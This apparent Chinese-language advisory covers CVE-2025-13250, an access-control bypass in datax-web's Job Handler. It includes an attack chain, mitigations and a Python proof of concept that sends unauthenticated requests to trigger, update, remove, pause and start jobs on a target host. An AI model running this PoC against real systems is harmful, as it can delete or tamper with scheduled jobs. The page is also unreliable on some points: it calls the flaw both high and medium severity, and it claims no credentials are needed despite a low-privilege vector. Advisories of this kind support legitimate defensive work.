CVE-2025-13250: datax-web Job Handler访问控制绕过漏洞

漏洞信息

漏洞编号

CVE-2025-13250

漏洞类型

访问控制绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WeiYe-Jing datax-web

漏洞概述

CVE-2025-13250是WeiYe-Jing datax-web项目中的一个高危访问控制漏洞，影响版本直至2.1.2。该漏洞存在于Job Handler组件的多个关键函数中，包括remove、update、pause、start和triggerJob等操作。由于系统对用户权限的验证存在缺陷，攻击者可以在低权限账户的情况下，绕过正常的访问控制机制，对调度任务执行未经授权的操作。这意味着任何能够访问系统的用户，无论其权限等级如何，都可以对任务调度系统进行增删改查等敏感操作。CVSS 6.3的评分表明该漏洞具有中等严重性，可通过网络远程利用，且不需要用户交互即可发起攻击。由于漏洞利用代码已经公开，攻击者可以轻松获取并使用，因此该漏洞对正在使用datax-web的组织构成实质性的安全威胁。

技术细节

该漏洞的根本原因在于datax-web的Job Handler组件对关键操作函数的权限验证不充分。系统未能正确实施基于角色的访问控制（RBAC），导致低权限用户可以调用本应需要更高权限的操作。具体来说，remove、update、pause、start和triggerJob这些Job管理函数缺少必要的权限检查。攻击者可以通过构造特定的HTTP请求，直接调用这些接口而无需提供相应的认证凭证或权限证明。漏洞利用的核心在于API端点未能验证请求者是否具有执行特定操作的合法权限。攻击者只需知道或猜测出相关的API路径和参数格式，即可对任务调度系统进行非法操作，包括删除关键任务、修改任务配置、暂停或启动任务等。这种权限控制缺陷使得系统面临未授权数据篡改和服务中断的风险。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统运行datax-web应用，并确定其版本是否在2.1.2或更早版本范围内

STEP 2

步骤2

攻击者获取目标系统的网络访问权限，识别Job Handler相关的API端点（/api/job/trigger、/api/job/update等）

STEP 3

步骤3

攻击者使用低权限账户或无需认证的情况下，构造恶意HTTP请求直接调用Job管理函数

STEP 4

步骤4

由于系统缺少权限验证，攻击请求被成功执行，实现对任务的未授权操作

STEP 5

步骤5

攻击者可以执行triggerJob触发恶意任务、update修改任务配置、remove删除关键任务、pause/start控制任务状态

STEP 6

步骤6

通过任务调度机制，攻击者可造成数据泄露、服务中断或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-13250 PoC - datax-web Broken Access Control
# Target: datax-web Job Handler functions

TARGET = "http://target-host:8080"

def exploit_job_handler():
    """
    Exploit CVE-2025-13250: Improper Access Control in Job Handler
    Affects: remove, update, pause, start, triggerJob functions
    """
    
    # Define vulnerable endpoints
    endpoints = {
        'triggerJob': f"{TARGET}/api/job/trigger",
        'update': f"{TARGET}/api/job/update",
        'remove': f"{TARGET}/api/job/remove",
        'pause': f"{TARGET}/api/job/pause",
        'start': f"{TARGET}/api/job/start"
    }
    
    # Common job parameters
    job_params = {
        'jobId': 1,
        'jobGroup': 'default'
    }
    
    print("[*] Testing CVE-2025-13250 - Broken Access Control in Job Handler")
    print(f"[*] Target: {TARGET}")
    
    for action, endpoint in endpoints.items():
        try:
            # Send request without proper authentication
            response = requests.post(endpoint, json=job_params, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] {action}: VULNERABLE - Request successful")
                print(f"    Response: {response.text[:200]}")
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] {action}: Protected - Authentication required")
            else:
                print(f"[*] {action}: Status code {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] {action}: Error - {str(e)}")

if __name__ == "__main__":
    exploit_job_handler()

影响范围

datax-web <= 2.1.2

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制datax-web的网络访问，仅允许受信任的IP地址访问管理接口；2）配置网络层防火墙规则，阻止未授权用户访问/api/job/*路径；3）临时禁用非必要的Job Handler功能；4）启用详细的访问日志并设置异常操作告警；5）考虑使用反向代理添加额外的认证层；6）对现有用户权限进行全面审查，确保遵循最小权限原则。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13250
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13250
3 Details https://www.cvedetails.com/cve/CVE-2025-13250/
4 VulDB https://vuldb.com/cve/CVE-2025-13250
5 Link https://github.com/Xzzz111/exps/blob/main/archives/datax-web-broken-access-control-1/report.md
6 Link https://vuldb.com/?ctiid.332584
7 Link https://vuldb.com/?id.332584
8 Link https://vuldb.com/?submit.687604